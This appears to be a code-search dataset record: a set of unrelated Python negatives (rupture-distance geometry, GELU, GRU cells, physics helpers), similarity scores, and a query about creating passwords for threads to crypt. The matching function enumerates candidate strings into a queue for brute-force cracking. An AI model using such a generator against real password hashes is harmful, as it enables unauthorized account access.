iq1 = np.zeros(n_groups, dtype='int16')\n for k in uind:\n ii = [i for i, j in enumerate(group_ind) if j == uind[k]]\n iq0[k] = int(np.min(ii))\n iq1[k] = int(np.max(ii))\n\n # ---------------------------------------------------------------------\n # This is an iterator for each possible combination of traces\n # including trace orientations (i.e., flipped).\n # ---------------------------------------------------------------------\n\n it_seg = it.product(it.combinations(uind, 2),\n it.product([0, 1], [0, 1]))\n\n # Placeholder for the trace pair/orientation that gives the\n # largest distance.\n dist_save = 0\n\n for k in it_seg:\n s0ind = k[0][0]\n s1ind = k[0][1]\n p0ind = k[1][0]\n p1ind = k[1][1]\n if p0ind == 0:\n P0 = quadlist[iq0[s0ind]][0]\n else:\n P0 = quadlist[iq1[s0ind]][1]\n if p1ind == 0:\n P1 = quadlist[iq1[s1ind]][0]\n else:\n P1 = quadlist[iq0[s1ind]][1]\n\n dist = geodetic.distance(P0.longitude, P0.latitude, 0.0,\n P1.longitude, P1.latitude, 0.0)\n if dist > dist_save:\n dist_save = dist\n A0 = P0\n A1 = P1\n\n # ---------------------------------------------------------------------\n # A0 and A1 are the furthest two segment endpoints, but we still\n # need to sort out which one is the \"origin\".\n # ---------------------------------------------------------------------\n\n # This goofy while-loop is to adjust the side of the rupture where the\n # origin is located\n dummy = -1\n while dummy < 0:\n A0.depth = 0\n A1.depth = 0\n p_origin = Vector.fromPoint(A0)\n a0 = Vector.fromPoint(A0)\n a1 = Vector.fromPoint(A1)\n ahat = (a1 - a0).norm()\n\n # Loop over traces\n e_j = np.zeros(n_groups)\n b_prime = [None] * n_groups\n for j in range(n_groups):\n P0 = quadlist[iq0[j]][0]\n P1 = quadlist[iq1[j]][1]\n P0.depth = 0\n P1.depth = 0\n p0 = Vector.fromPoint(P0)\n p1 = Vector.fromPoint(P1)\n b_prime[j] = p1 - p0\n e_j[j] = ahat.dot(b_prime[j])\n E = np.sum(e_j)\n\n # List of discordancy\n dc = [np.sign(a) * np.sign(E) for a in e_j]\n b = Vector(0, 0, 0)\n for j in range(n_groups):\n b.x = b.x + b_prime[j].x * dc[j]\n b.y = b.y + b_prime[j].y * dc[j]\n b.z = b.z + b_prime[j].z * dc[j]\n bhat = b.norm()\n dummy = bhat.dot(ahat)\n if dummy < 0:\n tmpA0 = copy.deepcopy(A0)\n A0 = copy.deepcopy(A1)\n A1 = tmpA0\n\n # ---------------------------------------------------------------------\n # To fix discordancy, need to flip quads and rearrange\n # the order of quadgc2\n # ---------------------------------------------------------------------\n\n # 1) flip quads\n for i in range(len(quadgc2)):\n if dc[group_ind[i]] < 0:\n quadgc2[i] = reverse_quad(quadgc2[i])\n\n # 2) rearrange quadlist order\n qind = np.arange(len(quadgc2))\n for i in range(n_groups):\n qsel = qind[group_ind_np == uind[i]]\n if dc[i] < 0:\n qrev = qsel[::-1]\n qind[group_ind_np == uind[i]] = qrev\n\n quadgc2old = copy.deepcopy(quadgc2)\n for i in range(len(qind)):\n quadgc2[i] = quadgc2old[qind[i]]\n\n # End of if-statement for adjusting group discordancy\n\n s_i = 0.0\n l_i = np.zeros(len(quadgc2))\n\n for i in range(len(quadgc2)):\n G0, G1, G2, G3 = quadgc2[i]\n\n # Compute u_i and t_i for this quad\n t_i = __calc_t_i(G0, G1, lat, lon, proj)\n u_i = __calc_u_i(G0, G1, lat, lon, proj)\n\n # Quad length (top edge)\n l_i[i] = get_quad_length(quadgc2[i])\n\n # ---------------------------------------------------------------------\n # Weight of segment, three cases\n # ---------------------------------------------------------------------\n\n # Case 3: t_i == 0 and 0 <= u_i <= l_i\n w_i = np.zeros_like(t_i)\n\n # To avoid division by zero in totweight later on:\n ix = (t_i == 0) & (0 <= u_i) & (u_i <= l_i[i])\n totweight[ix] = 1.0\n\n # Case 1:\n ix = t_i != 0\n w_i[ix] = (1.0 / t_i[ix]) * (np.arctan(\n (l_i[i] - u_i[ix]) / t_i[ix]) - np.arctan(-u_i[ix] / t_i[ix]))\n\n # Case 2:\n ix = (t_i == 0) & ((u_i < 0) | (u_i > l_i[i]))\n w_i[ix] = 1 / (u_i[ix] - l_i[i]) - 1 / u_i[ix]\n\n totweight = totweight + w_i\n GC2T = GC2T + w_i * t_i\n\n if n_groups == 1:\n GC2U = GC2U + w_i * (u_i + s_i)\n else:\n if i == 0:\n qind = np.array(range(len(quadgc2)))\n l_kj = 0\n s_ij_1 = 0\n else:\n l_kj = l_i[(group_ind_np == group_ind_np[i]) & (qind < i)]\n s_ij_1 = np.sum(l_kj)\n\n # First endpoint in the current 'group' (or 'trace' in GC2 terms)\n p1 = Vector.fromPoint(quadgc2[iq0[group_ind[i]]][0])\n s_ij_2 = (p1 - p_origin).dot(np.sign(E) * ahat) / 1000.0\n\n # Above is GC2N, for GC2T use:\n # s_ij_2 = (p1 - p_origin).dot(bhat) / 1000.0\n\n s_ij = s_ij_1 + s_ij_2\n GC2U = GC2U + w_i * (u_i + s_ij)\n\n s_i = s_i + l_i[i]\n\n GC2T = GC2T / totweight\n GC2U = GC2U / totweight\n\n # Dictionary for holding the distances\n distdict = dict()\n\n distdict['T'] = copy.deepcopy(GC2T).reshape(oldshape)\n distdict['U'] = copy.deepcopy(GC2U).reshape(oldshape)\n\n # Take care of Rx\n Rx = copy.deepcopy(GC2T) # preserve sign (no absolute value)\n Rx = Rx.reshape(oldshape)\n distdict['rx'] = Rx\n\n # Ry\n Ry = GC2U - s_i / 2.0\n Ry = Ry.reshape(oldshape)\n distdict['ry'] = Ry\n\n # Ry0\n Ry0 = np.zeros_like(GC2U)\n ix = GC2U < 0\n Ry0[ix] = np.abs(GC2U[ix])\n if n_groups > 1:\n s_i = s_ij + l_i[-1]\n ix = GC2U > s_i\n Ry0[ix] = GC2U[ix] - s_i\n Ry0 = Ry0.reshape(oldshape)\n distdict['ry0'] = Ry0\n\n return distdict", "def gb(self):\n return self.data.gb", "def genus(self):\n return 1 - self.euler_characteristic() // 2", "def ez_spevtg(self, ez):\n assert(ez['GRSINCFNDRSNG'].dtype.type in [np.int64, np.float64])\n assert(ez['GRSINCGAMING'].dtype.type in [np.int64, np.float64])\n\n return ez['GRSINCFNDRSNG'] + ez['GRSINCGAMING']", "def units(self):\n pass", "def _computeGC2(rupture, lon, lat, depth):\n\n quadlist = rupture.getQuadrilaterals()\n quadgc2 = copy.deepcopy(quadlist)\n\n oldshape = lon.shape\n\n if len(oldshape) == 2:\n newshape = (oldshape[0] * oldshape[1], 1)\n else:\n newshape = (oldshape[0], 1)\n\n #--------------------------------------------------------------------------\n # Define a projection that spans sites and rupture\n #--------------------------------------------------------------------------\n\n all_lat = np.append(lat, rupture.lats)\n all_lon = np.append(lon, rupture.lons)\n\n west = np.nanmin(all_lon)\n east = np.nanmax(all_lon)\n south = np.nanmin(all_lat)\n north = np.nanmax(all_lat)\n proj = get_orthographic_projection(west, east, north, south)\n\n totweight = np.zeros(newshape, dtype=lon.dtype)\n GC2T = np.zeros(newshape, dtype=lon.dtype)\n GC2U = np.zeros(newshape, dtype=lon.dtype)\n\n #--------------------------------------------------------------------------\n # First sort out strike discordance and nominal strike prior to\n # starting the loop if there is more than one group/trace.\n #--------------------------------------------------------------------------\n group_ind = rupture._getGroupIndex()\n\n # Need group_ind as numpy array for sensible indexing...\n group_ind_np = np.array(group_ind)\n uind = np.unique(group_ind_np)\n n_groups = len(uind)\n\n if n_groups > 1:\n #----------------------------------------------------------------------\n # The first thing we need to worry about is finding the coordinate\n # shift. U's origin is \"selected from the two endpoints most\n # distant from each other.\"\n #----------------------------------------------------------------------\n\n # Need to get index of first and last quad\n # for each segment\n iq0 = np.zeros(n_groups, dtype='int16')\n iq1 = np.zeros(n_groups, dtype='int16')\n for k in uind:\n ii = [i for i, j in enumerate(group_ind) if j == uind[k]]\n iq0[k] = int(np.min(ii))\n iq1[k] = int(np.max(ii))\n\n #----------------------------------------------------------------------\n # This is an iterator for each possible combination of traces\n # including trace orientations (i.e., flipped).\n #----------------------------------------------------------------------\n\n it_seg = it.product(it.combinations(uind, 2),\n it.product([0, 1], [0, 1]))\n\n # Placeholder for the trace pair/orientation that gives the\n # largest distance.\n dist_save = 0\n\n for k in it_seg:\n s0ind = k[0][0]\n s1ind = k[0][1]\n p0ind = k[1][0]\n p1ind = k[1][1]\n if p0ind == 0:\n P0 = quadlist[iq0[s0ind]][0]\n else:\n P0 = quadlist[iq1[s0ind]][1]\n if p1ind == 0:\n P1 = quadlist[iq1[s1ind]][0]\n else:\n P1 = quadlist[iq0[s1ind]][1]\n\n dist = geodetic.distance(P0.longitude, P0.latitude, 0.0,\n P1.longitude, P1.latitude, 0.0)\n if dist > dist_save:\n dist_save = dist\n A0 = P0\n A1 = P1\n\n #----------------------------------------------------------------------\n # A0 and A1 are the furthest two segment endpoints, but we still\n # need to sort out which one is the \"origin\".\n #----------------------------------------------------------------------\n\n # This goofy while-loop is to adjust the side of the rupture where the\n # origin is located\n dummy = -1\n while dummy < 0:\n A0.depth = 0\n A1.depth = 0\n p_origin = Vector.fromPoint(A0)\n a0 = Vector.fromPoint(A0)\n a1 = Vector.fromPoint(A1)\n ahat = (a1 - a0).norm()\n\n # Loop over traces\n e_j = np.zeros(n_groups)\n b_prime = [None] * n_groups\n for j in range(n_groups):\n P0 = quadlist[iq0[j]][0]\n P1 = quadlist[iq1[j]][1]\n P0.depth = 0\n P1.depth = 0\n p0 = Vector.fromPoint(P0)\n p1 = Vector.fromPoint(P1)\n b_prime[j] = p1 - p0\n e_j[j] = ahat.dot(b_prime[j])\n E = np.sum(e_j)\n\n # List of discordancy\n dc = [np.sign(a) * np.sign(E) for a in e_j]\n b = Vector(0, 0, 0)\n for j in range(n_groups):\n b.x = b.x + b_prime[j].x * dc[j]\n b.y = b.y + b_prime[j].y * dc[j]\n b.z = b.z + b_prime[j].z * dc[j]\n bhat = b.norm()\n dummy = bhat.dot(ahat)\n if dummy < 0:\n tmpA0 = copy.deepcopy(A0)\n tmpA1 = copy.deepcopy(A1)\n A0 = tmpA1\n A1 = tmpA0\n\n #----------------------------------------------------------------------\n # To fix discordancy, need to flip quads and rearrange\n # the order of quadgc2\n #----------------------------------------------------------------------\n\n # 1) flip quads\n for i in range(len(quadgc2)):\n if dc[group_ind[i]] < 0:\n quadgc2[i] = reverse_quad(quadgc2[i])\n\n # 2) rearrange quadlist order\n qind = np.arange(len(quadgc2))\n for i in range(n_groups):\n qsel = qind[group_ind_np == uind[i]]\n if dc[i] < 0:\n qrev = qsel[::-1]\n qind[group_ind_np == uind[i]] = qrev\n\n quadgc2old = copy.deepcopy(quadgc2)\n for i in range(len(qind)):\n quadgc2[i] = quadgc2old[qind[i]]\n\n # End of if-statement for adjusting group discordancy\n\n s_i = 0.0\n l_i = np.zeros(len(quadgc2))\n\n for i in range(len(quadgc2)):\n G0, G1, G2, G3 = quadgc2[i]\n\n # Compute u_i and t_i for this quad\n t_i = __calc_t_i(G0, G1, lat, lon, proj)\n u_i = __calc_u_i(G0, G1, lat, lon, proj)\n\n # Quad length (top edge)\n l_i[i] = get_quad_length(quadgc2[i])\n\n #----------------------------------------------------------------------\n # Weight of segment, three cases\n #----------------------------------------------------------------------\n\n # Case 3: t_i == 0 and 0 <= u_i <= l_i\n w_i = np.zeros_like(t_i)\n\n # Case 1:\n ix = t_i != 0\n w_i[ix] = (1.0 / t_i[ix]) * (np.arctan((l_i[i] -\n u_i[ix]) / t_i[ix]) - np.arctan(-u_i[ix] / t_i[ix]))\n\n # Case 2:\n ix = (t_i == 0) & ((u_i < 0) | (u_i > l_i[i]))\n w_i[ix] = 1 / (u_i[ix] - l_i[i]) - 1 / u_i[ix]\n\n totweight = totweight + w_i\n GC2T = GC2T + w_i * t_i\n\n if n_groups == 1:\n GC2U = GC2U + w_i * (u_i + s_i)\n else:\n if i == 0:\n qind = np.array(range(len(quadgc2)))\n l_kj = 0\n s_ij_1 = 0\n else:\n l_kj = l_i[(group_ind_np == group_ind_np[i]) & (qind < i)]\n s_ij_1 = np.sum(l_kj)\n\n # First endpoint in the current 'group' (or 'trace' in GC2 terms)\n p1 = Vector.fromPoint(quadgc2[iq0[group_ind[i]]][0])\n s_ij_2 = (p1 - p_origin).dot(np.sign(E) * ahat) / 1000.0\n\n # Above is GC2N, for GC2T use:\n #s_ij_2 = (p1 - p_origin).dot(bhat) / 1000.0\n\n s_ij = s_ij_1 + s_ij_2\n GC2U = GC2U + w_i * (u_i + s_ij)\n\n s_i = s_i + l_i[i]\n\n GC2T = GC2T / totweight\n GC2U = GC2U / totweight\n\n # Dictionary for holding the distances\n distdict = dict()\n\n distdict['T'] = copy.deepcopy(GC2T).reshape(oldshape)\n distdict['U'] = copy.deepcopy(GC2U).reshape(oldshape)\n\n # Take care of Rx\n Rx = copy.deepcopy(GC2T) # preserve sign (no absolute value)\n Rx = Rx.reshape(oldshape)\n distdict['rx'] = Rx\n\n # Ry\n Ry = GC2U - s_i / 2.0\n Ry = Ry.reshape(oldshape)\n distdict['ry'] = Ry\n\n # Ry0\n Ry0 = np.zeros_like(GC2U)\n ix = GC2U < 0\n Ry0[ix] = np.abs(GC2U[ix])\n if n_groups > 1:\n s_i = s_ij + l_i[-1]\n ix = GC2U > s_i\n Ry0[ix] = GC2U[ix] - s_i\n Ry0 = Ry0.reshape(oldshape)\n distdict['ry0'] = Ry0\n\n return distdict", "def gelu(x):\n return f_gelu(x)", "def __call__(self, inputs, state, scope=None):\n with tf.variable_scope(scope or type(self).__name__): # \"GRUCell\"\n with tf.variable_scope(\"Gates\"): # Reset gate and update gate.\n # We start with bias of 1.0 to not reset and not update.\n r, u = tf.split(1, 2, linear([inputs, state],\n 2 * self._num_units, True, 1.0))\n r, u = tf.nn.sigmoid(r), tf.nn.sigmoid(u)\n with tf.variable_scope(\"Candidate\"):\n c = self._activation(linear([inputs, r * state],\n self._num_units, True))\n new_h = u * state + (1 - u) * c\n return tf.concat(1, [new_h, r, u]), new_h", "def garnet():\n\n rho = 3660.\n\n C = np.zeros((6,6), dtype=float)\n C[0,0] = 306.2; C[0,1] = 112.5; C[0,2] = 112.5; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 306.2; C[1,2] = 112.5; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 306.2; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 92.7; C[3,4] = 0.; C[3,5] = 0.\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 92.7; C[4,5] = 0.\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 92.7\n\n return C, rho", "def g(self, t, s, u):\n P, g = s\n return np.matrix([self.Toc * P])", "def get_gru_node_gene(key, config):\n gene1 = GruNodeGene(key, config, input_keys=[-1], input_keys_full=[-1, -2])\n gene1.activation = 'a'\n gene1.bias_hh = np.zeros(gene1.bias_hh.shape)\n gene1.bias_ih = np.zeros(gene1.bias_ih.shape)\n gene1.weight_hh = np.zeros(gene1.weight_hh.shape)\n gene1.weight_ih_full = np.zeros(gene1.weight_ih_full.shape)\n gene1.update_weight_ih()\n gene2 = GruNodeGene(key, config, input_keys=[-1], input_keys_full=[-1, -3])\n gene2.activation = 'b'\n gene2.bias_hh = np.ones(gene2.bias_hh.shape)\n gene2.bias_ih = np.ones(gene2.bias_ih.shape)\n gene2.weight_hh = np.ones(gene2.weight_hh.shape)\n gene2.weight_ih_full = np.ones(gene2.weight_ih_full.shape)\n gene2.update_weight_ih()\n return gene1, gene2", "def _sample_gumbel(self, shape, eps=1e-20):\r\n U = tf.random_uniform(shape, minval=0, maxval=1)\r\n return -tf.log(-tf.log(U + eps) + eps)", "def riemannian_grads(self):\n u = self.feature_embedding.weight.grad\n x = self.feature_embedding.weight.data\n u.narrow(-1, 0, 1).mul_(-1)\n u.addcmul_(ldot(x, u, keepdim=True).expand_as(x), x)\n return u # can be delete?", "def create_glider_gun(i, j, grid):\n\n ggun = np.zeros(11*38).reshape(11, 38)\n\n ggun[5][1] = ggun[5][2] = 1\n ggun[6][1] = ggun[6][2] = 1\n\n ggun[3][13] = ggun[3][14] = 1\n ggun[4][12] = ggun[4][16] = 1\n ggun[5][11] = ggun[5][17] = 1\n ggun[6][11] = ggun[6][15] = ggun[6][17] = ggun[6][18] = 1\n ggun[7][11] = ggun[7][17] = 1\n ggun[8][12] = ggun[8][16] = 1\n ggun[9][13] = ggun[9][14] = 1\n\n ggun[1][25] = 1\n ggun[2][23] = ggun[2][25] = 1\n ggun[3][21] = ggun[3][22] = 1\n ggun[4][21] = ggun[4][22] = 1\n ggun[5][21] = ggun[5][22] = 1\n ggun[6][23] = ggun[6][25] = 1\n ggun[7][25] = 1\n\n ggun[3][35] = ggun[3][36] = 1\n ggun[4][35] = ggun[4][36] = 1\n\n grid[i:i+11, j:j+38] = ggun", "def _get_gpos ( self ):\n bpos = mgrid[self.x_min:self.x_max:self.nxsteps*1j, \\\n self.y_min:self.y_max:self.nysteps*1j, \\\n self.z:self.z+0.1]\n bpos.resize((3, self.size))\n return bpos", "def n_rings(self) -> ir.IntegerValue:\n return ops.GeoNRings(self).to_expr()", "def build_gru_model(num_features,\n embedding_size=None,\n kernel_size=None,\n filters=None,\n pool_size=None,\n gru_output_size=None):\n # Embedding\n if embedding_size is None:\n embedding_size = 64\n\n # Convolution\n if kernel_size is None:\n kernel_size = 5\n if filters is None:\n filters = 64\n if pool_size is None:\n pool_size = 4\n\n # GRU\n if gru_output_size is None:\n gru_output_size = 70\n\n print('Build model...')\n\n gru_model = models.gru(num_features,\n embedding_size=embedding_size,\n kernel_size=kernel_size,\n filters=filters,\n pool_size=pool_size,\n gru_output_size=gru_output_size)\n\n return gru_model", "def gelu(self, x):\r\n cdf = 0.5 * (1.0 + tf.tanh(\r\n (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\r\n return x * cdf", "def mkrngs(self):\n self.bkg[[0, -1]] = False\n bkgr = self.Time[self.bkg ^ np.roll(self.bkg, -1)]\n self.bkgrng = np.reshape(bkgr, [bkgr.size // 2, 2])\n\n self.sig[[0, -1]] = False\n sigr = self.Time[self.sig ^ np.roll(self.sig, 1)]\n self.sigrng = np.reshape(sigr, [sigr.size // 2, 2])\n\n self.trn[[0, -1]] = False\n trnr = self.Time[self.trn ^ np.roll(self.trn, 1)]\n self.trnrng = np.reshape(trnr, [trnr.size // 2, 2])", "def mu(self):\n return self.mass * G", "def gelu(x):\n cdf = 0.5 * (1.0 + tf.math.erf(x / tf.math.sqrt(2.0)))\n return x * cdf", "def tau2g(td, tr, r=2000):\n itau_1 = 1/td\n itau_2 = 1/tr\n\n inv_subs = 1/(itau_1-itau_2)\n # from dayan abott 5.34\n norm = -itau_1 * np.power(itau_1/itau_2, itau_2*inv_subs) * inv_subs\n (g1, g2) = (np.exp(-1/td/r)+np.exp(-1/tr/r), -np.exp(-1/td/r) * np.exp(-1/tr/r))\n return (g1, g2), norm", "def unit(self):\n return self._unit", "def gelu(features, approximate=False, name=None):\n with ops.name_scope(name, \"Gelu\", [features]):\n features = ops.convert_to_tensor(features, name=\"features\")\n if not features.dtype.is_floating:\n raise ValueError(\n \"`features.dtype` must be a floating point tensor.\"\n f\"Received:features.dtype={features.dtype}\")\n if approximate:\n coeff = math_ops.cast(0.044715, features.dtype)\n return 0.5 * features * (\n 1.0 + math_ops.tanh(0.7978845608028654 *\n (features + coeff * math_ops.pow(features, 3))))\n else:\n return 0.5 * features * (1.0 + math_ops.erf(\n features / math_ops.cast(1.4142135623730951, features.dtype)))", "def uvgrid(self):\n if self.baselines_type != \"grid_centres\":\n ugrid = np.linspace(-self.uv_max, self.uv_max, self.n_uv + 1) # +1 because these are bin edges.\n return (ugrid[1:] + ugrid[:-1]) / 2\n else:\n # return the uv\n return self.baselines", "def calc_gravitational_energy(self):\n\n star = self.star\n\n M, K, N = star.mesh_size\n ph = star.phi_coords\n mu = star.mu_coords\n r = star.r_coords\n\n def S1(j, k):\n sum = 0\n\n for i in range(0, M - 2, 2):\n sum += (1 / 6) * (ph[i + 2] - ph[i]) * (star.rho[i, j, k] * star.Phi[i, j, k] + 4 *\n star.rho[i + 1, j, k] * star.Phi[i + 1, j, k] +\n star.rho[i + 2, j, k] * star.Phi[i + 2, j, k])\n return 2 * sum\n\n def S2(k):\n sum = 0\n\n for j in range(0, K - 2, 2):\n sum += (1 / 6) * (mu[j + 2] - mu[j]) * \\\n (S1(j, k) + 4 * S1(j + 1, k) + S1(j + 2, k))\n\n return 2 * sum\n\n W = 0\n\n for k in range(0, N - 2, 2):\n W -= 0.5 * (1 / 6) * (r[k + 2] - r[k]) * (r[k]**2 * S2(k) +\n 4 * r[k + 1]**2 * S2(k + 1) +\n r[k + 2]**2 * S2(k + 2))\n\n return W", "def N_gfun(self,y):\n return 0.0", "def diffusion(nt, nx, tmax, xmax, nu):\n # Increments\n dt = tmax/(nt-1)\n dx = xmax/(nx-1)\n plate_length = xmax\n max_iter_time = tmax\n\n alpha = nu\n delta_x = dx\n delta_t = (delta_x ** 2)/(4 * alpha)\n \n x = np.zeros(nx)\n t = np.zeros(nt)\n\n #delta_t = (delta_x ** 2)/(4 * alpha)\n gamma = (alpha * delta_t) / (delta_x ** 2)\n\n # Initialize solution: the grid of u(k, i)\n u = np.empty((nx, nt))\n\n # Initial condition everywhere inside the grid\n u_initial = np.random.uniform(low=28.5, high=55.5, size=(nx))\n\n # Boundary conditions\n u_top = 100\n u_bottom = 0.0\n\n # Set the initial condition\n u[:,0] = u_initial\n\n # Set the boundary conditions\n u[(nx-1):,:] = u_top\n u[:1,:] = u_bottom\n\n if dt <= (dx**2)/(2*alpha):\n print(\"you are lucky\")\n else: \n print(\"hmmm\",dt,(dx**2)/(4*alpha))\n for k in range(0, nt-1):\n for i in range(1, nx-1):\n u[i,k + 1] = gamma * (u[i+1][k] + u[i-1][k] - 2*u[i][k]) + u[i][k]\n\n\n # X Loop\n for i in range(0,nx):\n x[i] = i*dx\n # T Loop\n for i in range(0,nt):\n t[i] = i*dt\n return u, x, t", "def gelu(x):\n cdf = 0.5 * (1.0 + tf.tanh(\n (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\n return x * cdf", "def build_grains(self):\n\t\ttime = datetime.datetime.now()\n\t\tif self.probability == 0:\n\t\t\tfor cell in self.space.flat:\n\t\t\t\tif cell.state != 0 :\n\t\t\t\t\tcontinue\n\t\t\t\telif self.check_empty_neighbours(cell):\n\t\t\t\t\tcontinue\n\t\t\t\telse:\t\n\t\t\t\t\tneighbours = self.get_neighbours(cell)\n\t\t\t\t\tgrains = [0 for i in range(self.grains)]\n\t\t\t\t\tfor i in range(1,self.grains+1):\n\t\t\t\t\t\tfor neighbour in neighbours:\n\t\t\t\t\t\t\tif neighbour.state == i and neighbour.timestamp < time:\n\t\t\t\t\t\t\t\tgrains[i] = grains[i] + 1\n\t\t\t\t\tif grains == [0 for i in range(self.grains)]:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnew_grain = 0\n\t\t\t\t\tfor i in range(self.grains):\n\t\t\t\t\t\tif grains[i] >= new_grain:\n\t\t\t\t\t\t\tnew_grain = i\n\t\t\t\t\tcell.change_state(time, new_grain)\n\t\t\t\t\tself.empty_cells = self.empty_cells - 1\n\t\telse:\n\t\t\tfor cell in self.space.flat:\n\t\t\t\tif cell.state != 0 :\n\t\t\t\t\tcontinue\n\t\t\t\telif self.check_empty_neighbours(cell):\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tneighbours = self.get_neighbours(cell)\n\t\t\t\t\tif self.decide_changing(cell,neighbours,5, time):\n\t\t\t\t\t\tneighbours = self.get_nearest_neighbours(cell)\n\t\t\t\t\t\tif self.decide_changing(cell,neighbours,3, time):\n\t\t\t\t\t\t\tneighbours = self.get_further_neighbours(cell)\n\t\t\t\t\t\t\tif self.decide_changing(cell,neighbours,3, time):\n\t\t\t\t\t\t\t\tneighbours = self.get_neighbours(cell)\n\t\t\t\t\t\t\t\tgrains = [0 for i in range(self.grains)]\n\t\t\t\t\t\t\t\tfor i in range(1,self.grains+1):\n\t\t\t\t\t\t\t\t\tfor neighbour in neighbours:\n\t\t\t\t\t\t\t\t\t\tif neighbour.state == i and neighbour.timestamp < time:\n\t\t\t\t\t\t\t\t\t\t\tgrains[i] = grains[i] + 1\n\t\t\t\t\t\t\t\tif grains == [0 for i in range(self.grains)]:\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tnew_grain = 0\n\t\t\t\t\t\t\t\tfor i in range(self.grains):\n\t\t\t\t\t\t\t\t\tif grains[i] >= new_grain:\n\t\t\t\t\t\t\t\t\t\tnew_grain = i\n\t\t\t\t\t\t\t\trandom_number = random.random() * 100\n\t\t\t\t\t\t\t\tif random_number <= self.probability:\n\t\t\t\t\t\t\t\t\tcell.change_state(time, new_grain)\n\t\t\t\t\t\t\t\t\tself.empty_cells = self.empty_cells - 1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcontinue", "def test_regularization_0size_interval(self):\n reg = modelgen.get_regularization(2, 2)\n assert reg == 0.01", "def show_gf(self, x):\n g = np.zeros((len(x[0]), self._num_fu), dtype=np.float64)\n for j in range(self._num_fu):\n x1 = self._gf[j*5]\n x2 = self._gf[j*5+1]\n x3 = self._gf[j*5+2]\n w = self._gf[j*5+3]\n a = self._gf[j*5+4]\n r1 = pow((x[0]-x1), 2)+pow((x[1]-x2), 2)+pow((x[2]-x3), 2)\n g[:, j] = a*np.exp(-r1/abs(w))\n\n return g", "def g_tensor(self,gpara,gperp):\n gx = gperp\n gy = gperp\n gz = gpara\n\n self.gx = gx\n self.gy = gy\n self.gz = gz\n self.g_grid = np.array([[gx*gx, gx*gy, gx*gz],[gy*gx, gy*gy, gy*gz],[gz*gx, gz*gy, gz*gz]])\n # rotate the crystal coordinates so that I'm now in the coordinate system \n # given by the zeeman tensor's principal axes", "def gelu(x):\n cdf = 0.5 * (1.0 + tf.tanh(\n (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\n return x * cdf", "def ez_grrec(self, ez):\n assert(ez['TOTREV'].dtype.type in [np.int64, np.float64])\n assert(ez['SALEOTHG'].dtype.type in [np.int64, np.float64])\n assert(ez['DIREXP'].dtype.type in [np.int64, np.float64])\n assert(ez['GOODS'].dtype.type in [np.int64, np.float64])\n\n return ez['TOTREV'] + ez['SALEOTHG'] + ez['DIREXP'] + ez['GOODS']", "def __call__(self, inputs, state, scope=None):\n with tf.variable_scope(scope or type(self).__name__): # \"GRUCell\"\n with tf.variable_scope(\"Gates\"): # Reset gate and update gate.\n # We start with bias of 1.0 to not reset and not udpate.\n #pudb.set_trace()\n # k1 x k2 x Ox x Oh where k1 x k2 is the convolutional kernel spatial\n # size.\n Wzconv = tf.nn.conv2d(inputs, self.W_z, [1,1,1,1], padding='SAME')\n Uzconv = tf.nn.conv2d(state, self.U_z, [1,1,1,1], padding='SAME')\n Wrconv = tf.nn.conv2d(inputs, self.W_r, [1,1,1,1], padding='SAME')\n Urconv = tf.nn.conv2d(state, self.U_r, [1,1,1,1], padding='SAME')\n # sig(W_r * x_t + U_r * h_t-1 )\n u = tf.sigmoid(Wzconv + Uzconv)\n r = tf.sigmoid(Wrconv + Urconv)\n with tf.variable_scope(\"Candidate\"):\n # tanh(W * x_t + U * (r_t dot h_t-1) not confident yet.\n Wconv = tf.nn.conv2d(inputs, self.W, [1,1,1,1], padding='SAME')\n Uconv = tf.nn.conv2d(r*state, self.U, [1,1,1,1], padding='SAME')\n c = tf.tanh(tf.add(Wconv,Uconv))\n new_h = u * state + (1 - u) * c\n # output, state is (batch_size, H=7, W=7, num_units)\n return new_h, new_h" ]
[ "0.721755", "0.66543376", "0.6298048", "0.62718433", "0.5896392", "0.5840149", "0.57050383", "0.5683324", "0.56716853", "0.5620621", "0.56158394", "0.56078464", "0.55852866", "0.5582799", "0.5549927", "0.55428386", "0.5535521", "0.551115", "0.5498461", "0.54404557", "0.53838044", "0.5368872", "0.5368872", "0.5326926", "0.5260689", "0.52561486", "0.52371895", "0.5236806", "0.5217655", "0.5193848", "0.5186525", "0.51761734", "0.51667035", "0.5163425", "0.5160295", "0.5160155", "0.51465744", "0.514465", "0.5144243", "0.51429844", "0.51423895", "0.514231", "0.51370233", "0.5118049", "0.5105011", "0.5098842", "0.508409", "0.5072621", "0.50689495", "0.50426406", "0.50398207", "0.5039162", "0.5037784", "0.5031988", "0.5026528", "0.5025733", "0.502459", "0.502329", "0.5019964", "0.501895", "0.5011777", "0.50063854", "0.50025004", "0.5001995", "0.49983016", "0.49971732", "0.49958703", "0.4988914", "0.49875882", "0.49850437", "0.4983952", "0.4983894", "0.4972529", "0.49713758", "0.49653408", "0.49611047", "0.49599284", "0.49584672", "0.49562526", "0.49514744", "0.4942497", "0.49400172", "0.4937415", "0.49372083", "0.4931685", "0.49262974", "0.49261764", "0.4925521", "0.4921685", "0.4917517", "0.49143642", "0.4912441", "0.4907359", "0.49030432", "0.49029237", "0.49019137", "0.48960748", "0.48960194", "0.4895004", "0.48946247", "0.4894137" ]
0.0
-1
create base passwords for consumer threads to crypt
def generate_data(q, maxlen=2, minlen=1): alphabet = 'ab' alphabet = printable for l in range(minlen, maxlen+1): for s in product(alphabet, repeat=l): q.put( ''.join(s) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
